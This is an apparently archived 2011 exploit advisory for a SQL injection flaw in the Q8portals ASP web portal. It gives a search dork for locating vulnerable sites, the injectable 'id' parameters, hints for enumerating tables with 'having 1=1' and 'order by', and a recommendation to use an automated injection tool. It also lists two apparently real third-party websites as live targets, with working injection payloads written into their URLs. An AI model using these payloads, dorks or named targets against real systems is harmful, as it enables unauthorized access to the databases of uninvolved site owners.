Q8portals suffers from a remote SQL injection vulnerability.
2f0e704c70843725bf1eb4d403d8e58c9efc4a49b1c4fd6f56e336fd256b7ff4=========================================================================
Q8portals [asp] SQL Injection Vulnerability
==========================================================================
[+]Title :.......Q8portals [asp] SQL Injection Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Win Xp Sp 2/3
[~]Data :.............2011-05-13
---------------------------------------------------------------------------
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group
[~] Contact: Black.hat.tm@Gmail.Com
[~] Home: http://Black-HG.Org & http://Security-War.Com
[~] Vendor: http://www.Q8portals.com
[~] Category:: [webapps]
==========ExPl0iT3d by Net.Edit0r==========
[+] DORK: intext:Powered by: q8portals.com
[+] Description: You start using the command having 1 = 1 - name of
first table to find And more using the command (order by )other name
you will find tables
[ I ]. SQL Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[+++] Important: For Sql Injection easily program such Havij and use Hmei7
[P0C]: http://127.0.0.1/portal/articles_en.asp?id= [ SQL INJECTION]
[P0C]: http://127.0.0.1/portal/contents_en.asp?id=4 [ SQL INJECTION]
[L!v3 D3m0's]:
http://www.alowaidhoney.com/portal/articles_en.asp?id=-4%20group+by+ARTICLES.ARTICLE_ID,ARTICLES.ARTICLE_TITLE_AR,ARTICLES.ARTICLE_DESC_AR+having%201=1--
http://alghanimkw.com/portal/contents_en.asp?id=4%20group+by+CONTENTS.CONTENT_ID,CONTENTS.CONTENT_NAME_AR,CONTENTS.CONTENT_DESC_AR--
[+] TIME TABLE:
12 May 2011 - Vulnerability discovered.
13 May 2011 - Advisory released.
===========================================================================================
[!] Black Hat Group ./Iranian HackerZ
===========================================================================================
[!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net
===========================================================================================
[!] Greetz To : DarkCoder | p3nt3st3r | Amir-MaGiC | 3H34N | H3x |
D3adlY & All Iranian HackerZ
===========================================================================================
[!] Spec Th4nks: HUrr!c4nE | Virangar | B3hz4d | M4Hd1 | Mr.Xhat |
Immortal Boy |
__SENATOR__ | And All My Friendz
===========================================================================================
[!] Persian Gulf 4 Ever
I Love Iran And All Iranian People
===========================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed